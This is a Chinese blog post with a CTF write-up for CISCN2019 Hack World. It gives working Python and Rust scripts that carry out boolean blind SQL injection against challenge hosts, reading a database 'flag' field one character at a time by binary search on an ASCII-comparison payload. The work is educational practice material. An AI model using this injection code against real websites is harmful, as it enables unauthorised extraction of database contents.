51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

CTF-Sql注入相关

布尔盲注 {#布尔盲注}

经典案例:CISCN2019 Hack World

from time import sleep

import requests


目标地址
====



url = "http://0396fe4b-c4d2-49da-addd-97b5169e2bad.node5.buuoj.cn:81/index.php"


声名flag
======



flag = ""


索引
===


`i = 0
while True:
# 索引从1开始
i = i + 1
# 二分查找
left = 32 # 左边界
right = 127 # 右边界
while left < right: # 循环二分查找,当left==right时退出循环
mid = (left + right) // 2 # 中间值
# 生成sql注入payload,意味从flag表中读取flag字段的值,再截取索引位置的1个字符,
# 再转换为ascii码,对码值进行二分查找,找到输出1,找不到输出2
payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
data = {"id":payload}
# 发送注入请求
res = requests.post(url, data=data)
sleep(0.3)
if "Hello" in res.text: # 根据响应文本做出判断,这里说明目标码值在区域右侧,移动左侧边界
left = mid + 1
else:
right = mid # 反之在左侧
if left !=32: # 如果找到的码值不为32,还没结束,因为ascii码32代表空格
flag += chr(left) # 将找到的ascii码值转换为字符并拼接打印
print(flag)
else: # 如果找到的码值为32,说明substr函数截取的位置已经到末尾,退出程序
break
print("end")
`

pub async fn bool_blind_inject() -> Result<(), String> {
    let target_url = "http://6464d630-7fd5-42fb-8774-19370b670f4d.node5.buuoj.cn:81/index.php";
    let mut flag = String::new();
    let mut index = 0u8;
    loop {
        index += 1;
        let mut left = 32u8;
        let mut right = 127u8;
        while left < right {
            let mid = (left + right) / 2;
            let payload = format!("id=if(ascii(substr((select(flag)from(flag)),{},1))>{},1,2)", index, mid);
            let req = reqwest::Client::new()
                .post(target_url)
                .header("Content-Type", "application/x-www-form-urlencoded")
                .body(payload);

            match req.send().await {
                Ok(resp) => {
                    let resp_text = resp.text().await.unwrap();
                    if resp_text.contains("Hello") {
                        left = mid + 1;
                    } else {
                        right = mid;
                    }
                }
                Err(e) => {
                    println!("{:#?},try again", e);
                    continue;
                }
            }
        }
        if left !=32{
            flag.push(left as char);
            println!("{}", flag);
        }else{
            break;
        }
    }
    Ok(())
}
赞(0)
未经允许不得转载:工具盒子 » CTF-Sql注入相关